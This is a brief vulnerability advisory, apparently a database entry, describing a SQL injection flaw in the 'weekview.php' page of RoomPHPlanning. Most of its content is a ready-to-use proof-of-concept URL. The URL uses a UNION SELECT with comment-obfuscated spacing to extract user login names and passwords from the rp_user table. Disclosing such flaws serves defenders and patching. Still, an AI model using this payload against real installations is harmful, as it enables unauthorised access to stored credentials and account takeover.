RoomPHPlanning 'weekview.php' SQL Injection Vulnerability

RoomPHPlanning 'weekview.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof of concept is available:

http://www.example.com/weekview.php?idroom=-999/**/union/**/select/**/concat(LoginUs,0x3a,char(58),PwdUs),2,3/**/from/**/rp_user/**/where/**/IdRk=1/*